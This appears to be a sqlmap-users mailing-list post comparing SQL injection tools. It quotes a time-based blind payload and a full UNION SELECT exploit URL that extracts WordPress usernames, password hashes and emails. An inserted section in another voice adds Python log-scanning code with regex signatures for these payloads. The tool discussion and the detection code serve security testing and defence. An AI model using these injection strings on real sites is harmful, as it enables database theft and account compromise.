sqlmap/1.0-dev (r4351)
found this
Place: GET
Parameter: id
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=155 AND SLEEP(5)--
---
against
web application technology: Apache, PHP 5.2.8
back-end DBMS: MySQL 5.0.11
banner: '5.0.77'
but the exploit was agonizingly slow.
Testing each of the other individual techniques (--technique=BEUS) at default level and
risk produced no positives.
mysqlat0r found what it terms a 'method get, with single parameter, numerical
without comments' positive and could quickly catalog DBs and dump full tables.
Here is an example of its exploit URL:
http://127.0.0.1/news/edumacation/salsandvinablals/2011/individittiual09.php?id=-666%20UNION%20ALL%20SELECT%20null,concat(0x585858535441525444554D50585858,ID,0x7C7C7C,user_login,0x7C7C7C,user_pass,0x7C7C7C,user_nicename,0x7C7C7C,user_email,0x7C7C7C,user_url,0x7C7C7C,user_registered,0x7C7C7C,user_activation_key,0x7C7C7C,user_status,0x7C7C7C,display_name,0x7C7C7C,0x585858454E4444554D50585858),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20redridinghood_OSyummy2k11.wp_users%20LIMIT%200,10&
Full source for mysqlat0r is available here:
http://www.scrt.ch/en/attack/downloads/mini-mysqlat0r
My previous experience has been that mysqlat0r is only able to exploit what it
claims to have found about 10% of the time.
It would be nice if sqlmap would continue to test the other techniques even
after finding a positive, and show you a list of available positives in
subsequent passes, as some are much faster or have better features,
particularly when processing a dork result set.
I have seen it ask if I want to continue after a positive, but it doesn't seem
to actually attempt each of the other techniques; it just skips to the next
result-set item. I'll retest that.
I have been able to force it with the BEUST flags and select the preferred one
at runtime, but the UI for doing so is a little clumsy.
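The two injection shapes quoted in this post (sqlmap's time-based `AND SLEEP(5)` probe and mini-mysqlat0r's `UNION ALL SELECT null,concat(0x...)` request) are easy to spot from the defender's side in a web server access log. The following is an added example, not code from the post or from either tool; the log lines, hostnames and paths are constructed and the signature regexes are my own assumptions about what distinguishes the two techniques.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines modelled on the two payload shapes quoted
# in the post: sqlmap's time-based probe (AND SLEEP(5)) and mini-mysqlat0r's
# UNION ALL SELECT null,... with hex string markers. Paths and values are made up.
SAMPLE_LOG = """\
127.0.0.1 - - [10/Jan/2011:10:00:01 +0000] "GET /news/item.php?id=155 HTTP/1.1" 200 512
127.0.0.1 - - [10/Jan/2011:10:00:02 +0000] "GET /news/item.php?id=155%20AND%20SLEEP(5)-- HTTP/1.1" 200 512
127.0.0.1 - - [10/Jan/2011:10:00:09 +0000] "GET /news/item.php?id=-666%20UNION%20ALL%20SELECT%20null,concat(0x585858,user_login,0x7C7C7C,user_pass),null%20FROM%20wp_users%20LIMIT%200,10 HTTP/1.1" 200 2048
127.0.0.1 - - [10/Jan/2011:10:00:10 +0000] "GET /news/item.php?id=42&sort=asc HTTP/1.1" 200 500
"""

# Extract the request line ("METHOD URI HTTP/x.y") from a combined-format entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+"')

# Assumed signatures for the two techniques discussed in the post; applied to
# the URL-decoded query string so %20 encoding does not hide keywords.
SIGNATURES = {
    "time-based blind": re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I),
    "union-based": re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.I),
}


def classify_uri(uri):
    """Return the technique names whose signature matches the decoded query string."""
    query = uri.split("?", 1)[1] if "?" in uri else ""
    decoded = unquote_plus(query)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]


def scan_log(text):
    """Return (line_number, techniques) for each log line carrying a flagged request."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        techniques = classify_uri(m.group("uri"))
        if techniques:
            hits.append((lineno, techniques))
    return hits


if __name__ == "__main__":
    for lineno, techniques in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {', '.join(techniques)}")
```

Feeding a real access log through `scan_log` flags the time-based probe and the UNION dump separately, which is the distinction the post is asking sqlmap to surface on its side.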
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users